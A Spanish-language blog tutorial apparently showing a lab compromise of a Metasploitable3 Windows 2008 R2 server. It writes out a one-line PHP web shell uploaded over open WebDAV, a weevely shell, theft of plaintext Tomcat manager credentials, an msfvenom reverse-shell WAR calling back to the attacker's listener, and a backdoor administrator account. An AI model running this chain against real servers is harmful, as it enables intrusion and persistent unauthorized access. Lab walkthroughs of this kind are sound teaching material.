Enviado por Edu4rdSHL el Lun, 07/01/2019 - 15:27
Windows server pwned

Muchas veces las vulnerabilidades se encuentran donde usted menos lo imagina y hoy se lo vamos a mostrar por qué. Las malas configuraciones por parte de los administradores del sistema son la causa más común de los ataques exitosos a servidores en el mundo.

Para esta prueba usaremos:

1. Víctima - Una máquina virtual con un servidor web Windows 2008 R2, el servidor web estará corriendo en el puerto 8585.

2. Atacante - Una máquina virtual de BlackArch Linux, una distribución especializada para hacking. Esta máquina se manejará vía SSH.

Normalmente acostumbramos a realizar explotaciones usando Metasploit (ver artículos de metasploit), hoy lo haremos sin Metasploit y para ello usaremos estas herramientas: cadaver, wevely y curl.

· Escaneo el la máquina víctima

Como siempre, todo proceso de explotación debe empezar por conocer todo lo que se pueda sobre la víctima, así que lanzaremos un escaneo con nmap.

[edu4rdshl@blackarch ~]$ nmap -T4 -sV 192.168.1.70 -p 1-10000

Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-07 17:20 -05
Nmap scan report for 192.168.1.70
Host is up (0.0031s latency).
Not shown: 9969 closed ports
PORT     STATE SERVICE              VERSION
22/tcp   open  ssh                  OpenSSH 7.1 (protocol 2.0)
135/tcp  open  msrpc                Microsoft Windows RPC
139/tcp  open  netbios-ssn          Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds         Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1617/tcp open  rmiregistry          Java RMI
3000/tcp open  http                 WEBrick httpd 1.3.1 (Ruby 2.3.3 (2016-11-21))
3306/tcp open  mysql                MySQL 5.5.20-log
3389/tcp open  ms-wbt-server        Microsoft Terminal Service
3700/tcp open  giop                 CORBA naming service
4848/tcp open  ssl/http             Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8)
5985/tcp open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
7676/tcp open  java-message-service Java Message Service 301
8009/tcp open  ajp13                Apache Jserv (Protocol v1.3)
8019/tcp open  qbdb?
8020/tcp open  http                 Apache httpd
8022/tcp open  http                 Apache Tomcat/Coyote JSP engine 1.1
8027/tcp open  unknown
8028/tcp open  postgresql           PostgreSQL DB
8031/tcp open  ssl/unknown
8032/tcp open  desktop-central      ManageEngine Desktop Central DesktopCentralServer
8080/tcp open  http                 Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8)
8181/tcp open  ssl/http             Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8)
8282/tcp open  http                 Apache Tomcat/Coyote JSP engine 1.1
8383/tcp open  ssl/http             Apache httpd
8443/tcp open  ssl/https-alt?
8444/tcp open  desktop-central      ManageEngine Desktop Central DesktopCentralServer
8484/tcp open  http                 Jetty winstone-2.8
8585/tcp open  http                 Apache httpd 2.2.21 ((Win64) PHP/5.3.10 DAV/2)
8686/tcp open  rmiregistry          Java RMI
9200/tcp open  http                 Elasticsearch REST API 1.1.1 (name: Infamnia; Lucene 4.7)
9300/tcp open  vrace?
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; Device: remote management; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 175.12 seconds

Como podemos observar, en el puerto 8585 está corriendo Apache httpd, vamos a ver que hay en esa ruta.

server

server2

Como podemos ver, al final tenemos unas carpetas en "Your projects", especialmente una llamada "Uploads", veamos que hay.

uploads

Aparentemente nada... sin embargo podemos probar con la herramienta cadaver para probar si podemos subir archivos sin necesidad de autenticación.

Primero creamos una simple shell en php para pruebas.

[edu4rdshl@blackarch ~]$ echo '<?php echo shell_exec($_GET['e']); ?>' > shell.php 
[edu4rdshl@blackarch ~]$ cat shell.php 
<?php echo shell_exec($_GET[e]); ?>

Ahora intentaremos subirla con cadaver.

[edu4rdshl@blackarch ~]$ cadaver http://192.168.1.70:8585/uploads/
dav:/uploads/> put shell.php 
Uploading shell.php to `/uploads/shell.php':
Progress: [=============================>] 100.0% of 36 bytes succeeded.
dav:/uploads/> 

Como podemos ver, se ha subido exitosamente.

shell

Ahora veamos si podemos ejecutar comandos en el sistema remoto usando la shell. Para eso usaremos curl.

[edu4rdshl@blackarch ~]$ curl http://192.168.1.70:8585/uploads/shell.php?e=ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection 2:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::18a4:8538:d3fd:ee3%14
   Autoconfiguration IPv4 Address. . : 169.254.14.227
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : une.net.co
   Link-local IPv6 Address . . . . . : fe80::249f:86a9:a00f:37ae%11
   IPv4 Address. . . . . . . . . . . : 192.168.1.70
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.1.254

Tunnel adapter isatap.une.net.co:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : une.net.co

Tunnel adapter isatap.{E6F260CB-58D5-4831-8472-57C62CD0DD0B}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

Como podemos ver, en realidad funciona.

Ahora usaremos weevely para crear una web shell semi-interactiva y luego usamos cadaver nuevamente para subirla al servidor.

[edu4rdshl@blackarch ~]$ weevely generate sechacklabs123 /home/edu4rdshl/interactive.php
Generated '/home/edu4rdshl/interactive.php' with password 'sechacklabs123' of 759 byte size.

[edu4rdshl@blackarch ~]$ cadaver http://192.168.1.70:8585/uploads/
dav:/uploads/> put interactive.php 
Uploading interactive.php to `/uploads/interactive.php':
Progress: [=============================>] 100.0% of 759 bytes succeeded.

Lo siguiente es conectarnos a la shell usando weevely.

[edu4rdshl@blackarch ~]$ weevely http://192.168.1.70:8585/uploads/interactive.php sechacklabs123

[+] weevely 3.7.0

[+] Target:	192.168.1.70:8585
[+] Session:	/home/edu4rdshl/.weevely/sessions/192.168.1.70/interactive_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> 

Una vez en este punto, ejecutaremos cualquiera de los comandos disponibles en weevely y la herramienta intentará darnos la shell.

weevely> whoami
nt authority\local service
metasploitable3-win2k8:C:\wamp\www\uploads $

Ahí, tenemos la shell, vamos a ver las conexiones activas.

metasploitable3-win2k8:C:\wamp\www\uploads $ netstat -ant

Active Connections

  Proto  Local Address          Foreign Address        State           Offload State

  TCP    0.0.0.0:22             0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:3000           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8019           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8020           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8022           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8031           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8032           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8383           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8443           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8444           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:8585           0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:49157          0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:49160          0.0.0.0:0              LISTENING       InHost      
  TCP    0.0.0.0:49191          0.0.0.0:0              LISTENING       InHost      
  TCP    127.0.0.1:8009         127.0.0.1:49350        TIME_WAIT       InHost      
  TCP    127.0.0.1:8019         127.0.0.1:49286        ESTABLISHED     InHost      
  TCP    127.0.0.1:8022         127.0.0.1:49343        CLOSE_WAIT      InHost      
  TCP    127.0.0.1:8282         127.0.0.1:49349        TIME_WAIT       InHost      
  TCP    127.0.0.1:31000        127.0.0.1:32000        TIME_WAIT       InHost      
  TCP    127.0.0.1:32000        0.0.0.0:0              LISTENING       InHost      
  TCP    127.0.0.1:49155        127.0.0.1:49156        TIME_WAIT       InHost      
  TCP    127.0.0.1:49161        127.0.0.1:49162        TIME_WAIT       InHost      
  TCP    127.0.0.1:49163        127.0.0.1:49164        TIME_WAIT       InHost      
  TCP    127.0.0.1:49165        127.0.0.1:49166        TIME_WAIT       InHost      
  TCP    127.0.0.1:49167        127.0.0.1:49168        TIME_WAIT       InHost      
  TCP    127.0.0.1:49169        127.0.0.1:49170        TIME_WAIT       InHost      
  TCP    127.0.0.1:49171        127.0.0.1:49172        TIME_WAIT       InHost      
  TCP    127.0.0.1:49173        127.0.0.1:49174        TIME_WAIT       InHost      
  TCP    127.0.0.1:49175        127.0.0.1:49176        TIME_WAIT       InHost      
  TCP    127.0.0.1:49177        127.0.0.1:49178        TIME_WAIT       InHost      
  TCP    127.0.0.1:49180        127.0.0.1:49181        TIME_WAIT       InHost      
  TCP    127.0.0.1:49208        127.0.0.1:49209        TIME_WAIT       InHost      
  TCP    127.0.0.1:49210        127.0.0.1:49211        TIME_WAIT       InHost      
  TCP    127.0.0.1:49212        127.0.0.1:49213        TIME_WAIT       InHost      
  TCP    127.0.0.1:49214        127.0.0.1:49215        TIME_WAIT       InHost      
  TCP    127.0.0.1:49216        127.0.0.1:49217        TIME_WAIT       InHost      
  TCP    127.0.0.1:49218        127.0.0.1:49219        TIME_WAIT       InHost      
  TCP    127.0.0.1:49220        127.0.0.1:49221        TIME_WAIT       InHost      
  TCP    127.0.0.1:49222        127.0.0.1:49223        TIME_WAIT       InHost      
  TCP    127.0.0.1:49224        127.0.0.1:49225        TIME_WAIT       InHost      
  TCP    127.0.0.1:49226        127.0.0.1:49227        TIME_WAIT       InHost      
  TCP    127.0.0.1:49228        127.0.0.1:49229        TIME_WAIT       InHost      
  TCP    127.0.0.1:49230        127.0.0.1:49231        TIME_WAIT       InHost      
  TCP    127.0.0.1:49232        127.0.0.1:49233        TIME_WAIT       InHost      
  TCP    127.0.0.1:49234        127.0.0.1:49235        TIME_WAIT       InHost      
  TCP    127.0.0.1:49236        127.0.0.1:49237        TIME_WAIT       InHost      
  TCP    127.0.0.1:49238        127.0.0.1:49239        TIME_WAIT       InHost      
  TCP    127.0.0.1:49240        127.0.0.1:49241        TIME_WAIT       InHost      
  TCP    127.0.0.1:49242        127.0.0.1:49243        TIME_WAIT       InHost      
  TCP    127.0.0.1:49244        127.0.0.1:49245        TIME_WAIT       InHost      
  TCP    127.0.0.1:49246        127.0.0.1:49247        TIME_WAIT       InHost      
  TCP    127.0.0.1:49248        127.0.0.1:49249        TIME_WAIT       InHost      
  TCP    127.0.0.1:49250        127.0.0.1:49251        TIME_WAIT       InHost      
  TCP    127.0.0.1:49260        127.0.0.1:49261        TIME_WAIT       InHost      
  TCP    127.0.0.1:49262        127.0.0.1:49263        TIME_WAIT       InHost      
  TCP    127.0.0.1:49264        127.0.0.1:49265        TIME_WAIT       InHost      
  TCP    127.0.0.1:49266        127.0.0.1:49267        TIME_WAIT       InHost      
  TCP    127.0.0.1:49271        127.0.0.1:49272        ESTABLISHED     InHost      
  TCP    127.0.0.1:49272        127.0.0.1:49271        ESTABLISHED     InHost      
  TCP    127.0.0.1:49274        127.0.0.1:49275        ESTABLISHED     InHost      
  TCP    127.0.0.1:49275        127.0.0.1:49274        ESTABLISHED     InHost      
  TCP    127.0.0.1:49276        127.0.0.1:49277        ESTABLISHED     InHost      
  TCP    127.0.0.1:49277        127.0.0.1:49276        ESTABLISHED     InHost      
  TCP    127.0.0.1:49286        127.0.0.1:8019         ESTABLISHED     InHost      
  TCP    127.0.0.1:49343        127.0.0.1:8022         FIN_WAIT_2      InHost      
  TCP    127.0.0.1:49351        127.0.0.1:8028         SYN_SENT        InHost      
  TCP    127.0.0.1:49352        127.0.0.1:8028         SYN_SENT        InHost      
  TCP    127.0.0.1:49353        127.0.0.1:8028         SYN_SENT        InHost      
  TCP    169.254.14.227:139     0.0.0.0:0              LISTENING       InHost      
  TCP    192.168.1.70:139       0.0.0.0:0              LISTENING       InHost      
  TCP    192.168.1.70:8032      192.168.1.67:43464     LAST_ACK        InHost      
  TCP    192.168.1.70:8444      192.168.1.67:55492     LAST_ACK        InHost      
  TCP    192.168.1.70:8585      192.168.1.67:56508     TIME_WAIT       InHost      
  TCP    192.168.1.70:8585      192.168.1.67:56510     ESTABLISHED     InHost      
  TCP    192.168.1.70:49157     192.168.1.67:35512     LAST_ACK        InHost      
  TCP    192.168.1.70:49157     192.168.1.67:36944     LAST_ACK        InHost      
  TCP    192.168.1.70:49195     192.168.1.70:9300      TIME_WAIT       InHost      
  TCP    192.168.1.70:49196     192.168.1.70:9300      TIME_WAIT       InHost      
  TCP    192.168.1.70:49197     192.168.1.70:9300      TIME_WAIT       InHost      
  TCP    192.168.1.70:49198     192.168.1.70:9300      TIME_WAIT       InHost      
  TCP    192.168.1.70:49199     192.168.1.70:9300      TIME_WAIT       InHost      
  TCP    192.168.1.70:49200     192.168.1.70:9300      TIME_WAIT       InHost      
  TCP    192.168.1.70:49201     192.168.1.70:9300      TIME_WAIT       InHost      
  TCP    192.168.1.70:49202     192.168.1.70:9300      TIME_WAIT       InHost      
  TCP    192.168.1.70:49203     192.168.1.70:9300      TIME_WAIT       InHost      
  TCP    192.168.1.70:49204     192.168.1.70:9300      TIME_WAIT       InHost      
  TCP    192.168.1.70:49205     192.168.1.70:9300      TIME_WAIT       InHost      
  TCP    192.168.1.70:49206     192.168.1.70:9300      TIME_WAIT       InHost      
  TCP    192.168.1.70:49207     192.168.1.70:9300      TIME_WAIT       InHost      
  TCP    192.168.1.70:49344     8.39.54.107:443        TIME_WAIT       InHost      
  TCP    [::]:22                [::]:0                 LISTENING       InHost      
  TCP    [::]:135               [::]:0                 LISTENING       InHost      
  TCP    [::]:445               [::]:0                 LISTENING       InHost      
  TCP    [::]:8019              [::]:0                 LISTENING       InHost      
  TCP    [::]:8020              [::]:0                 LISTENING       InHost      
  TCP    [::]:8031              [::]:0                 LISTENING       InHost      
  TCP    [::]:8032              [::]:0                 LISTENING       InHost      
  TCP    [::]:8383              [::]:0                 LISTENING       InHost      
  TCP    [::]:8443              [::]:0                 LISTENING       InHost      
  TCP    [::]:8444              [::]:0                 LISTENING       InHost      
  TCP    [::]:8585              [::]:0                 LISTENING       InHost      
  TCP    [::]:49152             [::]:0                 LISTENING       InHost      
  TCP    [::]:49153             [::]:0                 LISTENING       InHost      
  TCP    [::]:49154             [::]:0                 LISTENING       InHost      
  TCP    [::]:49157             [::]:0                 LISTENING       InHost      
  TCP    [::]:49160             [::]:0                 LISTENING       InHost      
  TCP    [::]:49191             [::]:0                 LISTENING       InHost      
  UDP    0.0.0.0:5355           *:*                                                
  UDP    169.254.14.227:137     *:*                                                
  UDP    169.254.14.227:138     *:*                                                
  UDP    192.168.1.70:137       *:*                                                
  UDP    192.168.1.70:138       *:*                                                
  UDP    [::]:5355              *:*                                                
  UDP    [::]:56162             *:*                                                
metasploitable3-win2k8:C:\wamp\www\uploads $ 

Eché un vistazo a los otros servicios que están instalados. Al buscar en el directorio "Apache Software Foundation", encontramos una instalación de Tomcat junto con el archivo tomcat-users.xml con credenciales de texto sin cifrar para el administrador de Tomcat.

metasploitable3-win2k8:C:\wamp\www\uploads $ cd "C:\Program Files"

metasploitable3-win2k8:C:\Program Files $ dir
 Volume in drive C is Windows 2008R2
 Volume Serial Number is E805-EC8F

 Directory of C:\Program Files

09/30/2018  01:36 AM    <DIR>          .
09/30/2018  01:36 AM    <DIR>          ..
09/30/2018  01:18 AM    <DIR>          7-Zip
09/30/2018  01:21 AM    <DIR>          Apache Software Foundation
07/13/2009  07:20 PM    <DIR>          Common Files
09/30/2018  01:37 AM    <DIR>          elasticsearch-1.1.1
11/20/2010  07:33 PM    <DIR>          Internet Explorer
09/30/2018  01:21 AM    <DIR>          Java
09/30/2018  01:23 AM    <DIR>          jenkins
09/30/2018  01:24 AM    <DIR>          jmx
09/30/2018  01:12 AM    <DIR>          OpenSSH
09/30/2018  01:15 AM    <DIR>          Oracle
09/30/2018  01:26 AM    <DIR>          Rails_Server
11/20/2010  07:33 PM    <DIR>          Windows Mail
07/13/2009  09:37 PM    <DIR>          Windows NT
09/30/2018  01:15 AM    <DIR>          WindowsPowerShell
09/30/2018  01:24 AM    <DIR>          wordpress
               0 File(s)              0 bytes
              17 Dir(s)  48,053,305,344 bytes free

metasploitable3-win2k8:C:\Program Files $ cd "Apache Software Foundation"

metasploitable3-win2k8:C:\Program Files\Apache Software Foundation $ dir
 Volume in drive C is Windows 2008R2
 Volume Serial Number is E805-EC8F

 Directory of C:\Program Files\Apache Software Foundation

09/30/2018  01:21 AM    <DIR>          .
09/30/2018  01:21 AM    <DIR>          ..
09/30/2018  01:21 AM    <DIR>          tomcat
               0 File(s)              0 bytes
               3 Dir(s)  48,053,084,160 bytes free

metasploitable3-win2k8:C:\Program Files\Apache Software Foundation $ cd tomcat

metasploitable3-win2k8:C:\Program Files\Apache Software Foundation\tomcat $ dir
 Volume in drive C is Windows 2008R2
 Volume Serial Number is E805-EC8F

 Directory of C:\Program Files\Apache Software Foundation\tomcat

09/30/2018  01:21 AM    <DIR>          .
09/30/2018  01:21 AM    <DIR>          ..
03/18/2016  07:33 PM    <DIR>          apache-tomcat-8.0.33
               0 File(s)              0 bytes
               3 Dir(s)  48,053,026,816 bytes free

metasploitable3-win2k8:C:\Program Files\Apache Software Foundation\tomcat $ cd apache-tomcat-8.0.33

metasploitable3-win2k8:C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33 $ dir
 Volume in drive C is Windows 2008R2
 Volume Serial Number is E805-EC8F

 Directory of C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33

03/18/2016  07:33 PM    <DIR>          .
03/18/2016  07:33 PM    <DIR>          ..
03/18/2016  07:32 PM    <DIR>          bin
09/30/2018  01:21 AM    <DIR>          conf
03/18/2016  07:32 PM    <DIR>          lib
03/18/2016  07:32 PM            58,068 LICENSE
01/07/2019  12:19 PM    <DIR>          logs
03/18/2016  07:32 PM             1,489 NOTICE
03/18/2016  07:32 PM             6,911 RELEASE-NOTES
03/18/2016  07:32 PM            16,671 RUNNING.txt
01/07/2019  03:15 PM    <DIR>          temp
09/30/2018  01:36 AM    <DIR>          webapps
03/18/2016  07:31 PM    <DIR>          work
               4 File(s)         83,139 bytes
               9 Dir(s)  48,052,674,560 bytes free

metasploitable3-win2k8:C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33 $ cd conf

metasploitable3-win2k8:C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33\conf $ dir
 Volume in drive C is Windows 2008R2
 Volume Serial Number is E805-EC8F

 Directory of C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33\conf

09/30/2018  01:21 AM    <DIR>          .
09/30/2018  01:21 AM    <DIR>          ..
09/30/2018  01:21 AM    <DIR>          Catalina
03/18/2016  07:32 PM            12,624 catalina.policy
03/18/2016  07:32 PM             7,251 catalina.properties
03/18/2016  07:32 PM             1,613 context.xml
03/18/2016  07:32 PM             3,451 logging.properties
09/30/2018  01:14 AM             6,457 server.xml
09/30/2018  01:14 AM             2,309 tomcat-users.xml
03/18/2016  07:32 PM             2,692 tomcat-users.xsd
03/18/2016  07:32 PM           173,514 web.xml
               8 File(s)        209,911 bytes
               3 Dir(s)  48,051,527,680 bytes free
metasploitable3-win2k8:C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33\conf $ 

Veamos el contenido del archivo tomcat-users.xml

metasploitable3-win2k8:C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33\conf $ type tomcat-users.xml
<?xml version='1.0' encoding='utf-8'?>
<!--
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
<!--
  NOTE:  By default, no user is included in the "manager-gui" role required
  to operate the "/manager/html" web application.  If you wish to use this app,
  you must define such a user - the username and password are arbitrary. It is
  strongly recommended that you do NOT use one of the users in the commented out
  section below since they are intended for use with the examples web
  application.
-->
<!--
  NOTE:  The sample user and role entries below are intended for use with the
  examples web application. They are wrapped in a comment and thus are ignored
  when reading this file. If you wish to configure these users for use with the
  examples web application, do not forget to remove the <!.. ..> that surrounds
  them. You will also need to set the passwords to something appropriate.
-->
<!--
  <role rolename="tomcat"/>
  <role rolename="role1"/>
  <user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
  <user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
  <user username="role1" password="<must-be-changed>" roles="role1"/>
-->
  <role rolename="manager-gui"/>
  <user username="sploit" password="sploit" roles="manager-gui"/>
</tomcat-users>
metasploitable3-win2k8:C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33\conf $

Ahora vamos a ver en el archivo tomcat-server.xml para ver en que puerto está corriendo el servicio, aunque también podemos fijarnos en los resultados del escaneo con nmap.

metasploitable3-win2k8:C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33\conf $ more server.xml
<?xml version='1.0' encoding='utf-8'?>
<!--
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0
------------------------------------------------->
    <!-- A "Connector" represents an endpoint by which requests are received
         and responses are returned. Documentation at :
         Java HTTP Connector: /docs/config/http.html (blocking & non-blocking)
         Java AJP  Connector: /docs/config/ajp.html
         APR (HTTP/AJP) Connector: /docs/apr.html
         Define a non-SSL/TLS HTTP/1.1 Connector on port 8080
    -->
    <Connector port="8282" protocol="HTTP/1.1"
               connectionTimeout="20000"
               redirectPort="8443" />
    <!-- A "Connector" using the shared thread pool-->
    <!--
<--------------------------------------------
metasploitable3-win2k8:C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33\conf $ 

Como vemos, se encuentra en el puerto 8282, tal cual lo detectó nmap. Ahora iremos a esa dirección e intentaremos iniciar sesión con las credenciales obtenidas previamente.

Primero vamos a la dirección del servidor y como puerto colocamos 8282, seguidamente damos clic en "Manager App" e ingresamos las credenciales cuando se soliciten.

Exploit

Ahora que tenemos acceso al administrador de Tomcat, podemos crear un WAR file y subirlo.

war file

Crearemos un WAR backdoor usando msfvenom y una vez creado lo extraeremos para ver donde está el archivo .jsp que necesitamos.

[edu4rdshl@blackarch ~]$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=8443 -f war > shell.war

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of war file: 52150 bytes

[edu4rdshl@blackarch ~]$ ls
Desktop  Downloads  Git  Scripts  bin  go  interactive.php  perl5  scripts  shell.php  shell.war

[edu4rdshl@blackarch ~]$ unzip shell.war 
Archive:  shell.war
   creating: META-INF/
  inflating: META-INF/MANIFEST.MF    
   creating: WEB-INF/
  inflating: WEB-INF/web.xml         
  inflating: zzrsxegmgziw.jsp        
[edu4rdshl@blackarch ~]$ 

Ahora subimos el archivo y damos clic en "Deploy", una vez hecho nos aparecerá un mensaje confirmando que todo ha salido bien.

deploy

Ahora vamos a colocar a netcat a la escucha de conexiones usando el comando:

[edu4rdshl@blackarch ~]$ nc -lvnp 8443

Finalmente nos dirigimos al link que contiene el archivo .jsp, en nuestro caso: http://192.168.1.70:8282/shell/zzrsxegmgziw.jsp

Una vez abierto obtenemos nuestra shell y con privilegios de administrador.

[edu4rdshl@blackarch ~]$ nc -lvnp 8443
Connection from 192.168.1.70:49300
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33>whoami
whoami
nt authority\system

C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33>

Ahora crearemos un usuario administrador para tener nuestra propia cuenta de uso alternativo.

C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33>net user sechacklabs sechacklabs123 /add
net user sechacklabs sechacklabs123 /add
The command completed successfully.


C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33>net localgroup administrators sechacklabs /add
net localgroup administrators sechacklabs /add
The command completed successfully.


C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33>

Finalmente para poder usar otros servicios, necesitaremos añadir ciertos reenvíos de puertos. Ahora intentaré establecer una conexión de escritorio remoto desde la máquina atacante y usaré las credenciales de la cuenta administradora previamente creada.

rdesktop

Eso es todo por ahora, lo siguiente sería escalar privilegios al nivel SYSTEM que probablemente lo veremos más adelante para lo cual podemos usar metasploit. ¿Quien se iba a imaginar que con una simple carpeta de acceso público y sin ninguna importancia aparentemente pudiéramos llegar a hacer de todo en el servidor? Algún experimentado tal vez...

Registrate en el foro, síguenos en FacebookTwitterunete a nuestro chat en Discord y no olvides compartirnos en las redes sociales. También puede hacernos una donación o comprar nuestros servicios.

Acerca del autor

Especialista en Seguridad Informática bajo certificación OSCP, experto en técnicas de privacidad y seguridad en la red, analista de criptografía, Fundador de Security Hack Labs. Desarrollador de BlackArch Linux. Twitter: @edu4rdshl XMPP: edu4rdshl@conversations.im Threema ID: 736WU8VV